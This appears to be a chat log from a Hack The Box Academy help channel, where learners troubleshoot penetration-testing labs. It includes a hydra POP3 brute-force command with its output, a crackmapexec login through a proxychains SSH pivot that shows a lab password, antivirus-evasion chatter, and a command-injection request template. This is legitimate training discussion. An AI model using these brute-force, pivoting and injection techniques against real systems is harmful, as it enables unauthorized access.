Each time I upload the .dll, it gets deleted and if I am fast enough to get the command out the virus protection blocks
I have disabled windows defender

Defender and real-time protection are separate

Hi all, I'm currently trying to do the Skill Assessment of Shells && Payload. I had to pick up the hint for the second flag where it's give you tomcat credentials.
I'm curios to understand I shall gather those information. The used password dosen't seems to be in anyone of the mayor word list (SecList & Rockyou) for tomcat. I browsed a bit the SMB folders accessible as gust but I coludn't find any clue.

Use Google to find out what you need to do

Ah ha, thank you

well, defender is real time protection

Desktop of the jump host you're given

Real-time protection is a separate service

there are other real time protections running, but defender is real time protection

You can disable defender with RTP still running

I'm referring to the actual service and option labeled "Real-Time protection"

ahh lol

Not that defender doesn't run in real-time

😱 😱 😱 😱
Indeed my bad to think about it as a clean host

so many hours wasted

You're not the only one

Most people get stuck on firefox

At least I'm in good company haha

Thanks a lot as always

Np

hi may i ask whats the diff with RDP and WinRM? cant find much on it online, I assume RDP provides a GUI to control while WinRM is more on CLI?

from what i've understood from htb academy, they are all just diffrent remote access methods

each has its characteristics

chatgpt gives a great answer

WinRM is a CLI based remote management tool it only exists within the CLI

Yo guys i need someone to recover my gmail account

No

those are different protocol and as you said RDP provide GUI interaction while WinRM provide only cli management

Stfu

Read #rules

Nah, just telling you no one is gonna help you hack "your" own gmail

i see, thanks for the help guys! yep i know they are diff protocols just wondering whats the diff

If you wanna recover it go through Google Support

CLI vs GUI

this is not the place to be asking. reach out to google

Is the main difference

Other than that RDP can be enabled for any user, WinRM is generally enabled for admin users

is this a rabbit hole trying to mount hard pw lab

yep thanks!

marcie do you ever sleep

i see

No

we need to map out his online time
gonna look like 28 hours online in a day

You can search this channel for how to guides

really? is it pw protected then? trying to mount it like in the footprinting module fails

Mayhaps

damn

its never that easy

Good thing there's n2john for like every filetype and encryption

Since it's likely windows, you can make an educated guess

anyone with crackmapexec skill assessment could give me a hint, please?

sure

cracking johanna takes years

HOLEY this hard lab uses everything from the past modules

one question if I have started a module with some questions answered but my subscription runs out, do I still have access to the module or do I lose the progress?

Yes

 hydra -l user -P pws.list pop3://10.129.99.110 -t 10
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-28 16:13:54
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 333 login tries (l:1/p:333), ~34 tries per task
[DATA] attacking pop3://10.129.99.110:110/

Hydra just stops after showing attacking

If I enable -vV it just shows resolving then exit

Annual sub or student sub; you lose access to it. If it's the other monthly subs that gives cubes; no

This contains spoilers dude

so even if I had initiated it, nothing?

Correct, access is lost

redacted

thanks

I think progress remains, but that's a question for support tbh

How long are you waiting

5 seconds or so then it just exits to console

Ok so it's exiting itself

Also -t and -T are different

-T is threads, -t is tasks per thread

Using -t since its 1 target only.

Anyway

I forget if you need to drop the @inlanefreight.htb for this

Sometimes you do, Sometimes you don't

According to the fourms you need to include it

its been a minute ¯_(ツ)_/¯

Although the issue seems to be a bug in hydra, should I try any other tool ?

Try with a different service

Like imap

I forget if imaps/pop3s is enabled on this lab

porgess remains on all modules and sectios youve completed, if you DID NOT complete the module fully youll lose access

fun stpry i am now learning how to mount a bitlocker drive to llinux

what the everliving fuck

It's not that difficult

A couple guides are very much copy/paste

oh i know

i just never have done it

hello, im trying to execute ./username-anarchy -I ./names.txt but i get this error
./username-anarchy: line 7: syntax error near unexpected token newline' ./username-anarchy: line 7: <!DOCTYPE html>'

line 7

How did you copy the tool?

That looks like, to me, you used wget or something and copied the webpage

yeah, i used wget

Thats your problem then

It's a github repo yeah?

git clone <link.to.github>

You can also use wget to download from the raw link, if you only need one file

thank you guys

i have to go back and redo all of that

that last lab was REALLY fun

i did thind i didnt know my fingers were capable of

wait till lab 2 and 3

i completed both of them obviously... but if you think the SECTIONS are fun... oh buddy

Onward

https://academy.hackthebox.com/module/116/section/1173

Hydra just doesn't continue if I use pop3 as protocol

Imap and SMTP work but they don't have a valid login with the discovered username (using full email) m***@inlanefreight.htb, tried with the provided pws.list

Any ideas of what to do

hydra -l m**@inlanefreight.htb -P pws.txt pop3://10.... -t 10
hydra -l m**@inlanefreight.htb -P pws.list -f 10... pop3 -t 10

pop3 commands I have tried

digging obsidian

tasklist from powershell, and look for non standard .exe , or go to apps and features, and look for non-standard .exe

is there anybody around who has completed Skills Assessment - Hard from Abusing HTTP Misconfigurations? i'm 99% sure my exploit should work but i think i may be doing something slightly wrong here 😅

On Windows Privilege Escalation Skills Assessment - Part I do you have any ideas how i get CLSID? I used the GetCLSID tool from juicypotato, but i don't get it. 🙂

try different ones

I got it and i manged to escalate priv. 🙂

Attacking Common Services - Hard, i answered the first 3 questions, now the last one Submit the contents of the flag.txt file on the Administrator Desktop.
i tried to use the user john to login tot he msql server, but doesnt work, sould i try agian there or something else?

Mssql is the right approach. Maybe revisit that section to see what you can do

make sure you're grabbing the right ticket

Any suggestions?

If your wordlist didn't crack anything, then it simply doesn't contain the password, you may want to try a different wordlist.

Hmm, pop3?

Hi guys! I have a problem with questions of Active Infrastructure Identification! I have the ip target and the vHosts needed for the questions, once i added the ip with the vHosts to /etc/hosts, if i try to ping the hosts i have all packets lost and i can't use whatweb...i'm connected to the VPN connection file! Can someone help me?

Which protocol?

Were you able to solve this? I am stuck here as well.

The other mail protocol

smtp?

No

Imap

I use tcp protocol in the vpn file

Worked finnaly, thanks.

Did you add them properly

into the thick client application section where most ppl complain about

nope, just follow the section

SQL01 is not the right user

yes, i just added two new lines with the IP spawned and the names of the vHosts

Howdy yall, not sure if this is the right place to ask questions but, im quite new to all these stuff, dont really have much knowledge even on basic stuff, and i found myself kinda stuck while setting up my VM (virtual box), when I start the program it says "please insert a bootable medium and reboot". Does anyone have an idea of what could be the issue?

How did you add it/screenshot

Well you need to use an iso to install a vm.

I followed this one tutorial and also installed Kali and another thing, is that what ur refering?

no idea what you're talking about ¯_(ツ)_/¯

kali has pre-made VMs that you can download and instantly boot into

Kali also has pre-built vms for different vm software

i prefer setting up my own VM and then making a gold image out of it

no need for the two lines, just put all domain names on the same IP

okay ill see what i can do thanks

10.129.151.212 app.inlanefreight.local dev.inlanefreight.local

I changed the protocol of the vpn file from tcp to udp and now it works, i can ping

Working on https://academy.hackthebox.com/module/163/section/1549

And getting this output for crackmapexec:

┌──(kali㉿kali)-[/]
└─$ proxychains crackmapexec smb 172.16.8.3 -u ssmalls -p Str0ngpass86!

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  127.0.0.1:8081  ...  127.0.0.1:8080  ...  172.16.8.3:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8081  ...  127.0.0.1:8080  ...  172.16.8.3:445  ...  OK

Not sure what I'm missing here that I'm not getting the SMB response 🤔

i've only seen no response from cme when it isn't connecting

what's the response? those the proxychains output, use it with -q to disable them

There is no response, and when I hit it with the --verbose flag I'm seeing:

DEBUG Error creating SMBv3 connection to 172.16.8.3: ("Unpacked data doesn't match constant value ...

Along with a bunch of HTML? As if it's using the wrong protocol (unless that HTML is part of the debugger?)?

I'm quite sure cme doesn't output html, make sure your proxychains config is correct and maybe reset the target

I've tried resetting a couple times, and proxychains looks fine to the best of my knowledge (which isn't much).

Do I need more than socks5 127.0.0.1 8081 and I'm just dumb?

what are you using to pivot?

the default port for socks5 is 1080

sudo ssh -D 8081 -i dmz01_key root@10.129.28.242

Just been following the instructions verbatim with no issues until this 🤷

as i said, i've only seen cme not provide output when there is some kind of connectivity error. i would start by going over every IP address and hostname that's going into the equation here to use CME, including your proxy configuration, your vpn connectivity if you're using a vm, the ip of the victim, etc

generally you aren't going to be able to straight copy/paste things from the module because the IP address that spawns on your victim will be different, or they machine at the end will be slightly different so you can have first hand experience using the commands yourself as it helps reinforce learning

Yeah, fair enough. I'm almost positive it has to be something borked with my config.

That being said, in this scenario the IPs are consistent. It's far from the first box I've worked through so give me some (though not much_ credit 😛

But yeah, I get what you're saying. Might just start over blank slate and see if I can recreate 🤷

if you're using a vm, you can also try on the pwnbox, as the pwnbox is usually just setup with all the tools working etc.

it's also a good way to test if it's a problem with your computer or the config, because if both boxes have the same result it means you're not doing something right

Good call, I'll try that out.

Hello, who has worked with the crowdtap page

Is this a good place to reach out on for "Command Injections" module?

yeah just ask your question

I am struggling to obfuscate the payload for the Skill assessment section.

Does the payload go right here?
GET /index.php?to=tmp&from=51459716.txt{payload} HTTP/1.1

i believe that's covered under the "Injecting Commands" section

you have to find it

A lot is getting caught as "Malicious"

I guess what I am asking, is would I be able to execute a arbitrary commad like whoami?

well the whole module is about command injection, so yes, once you find the injection point and are able to bypass the defenses you could run whoami or any other system command

it's like a puzzle you have to try different combinations of bypasses and figure it out

Okay

thanks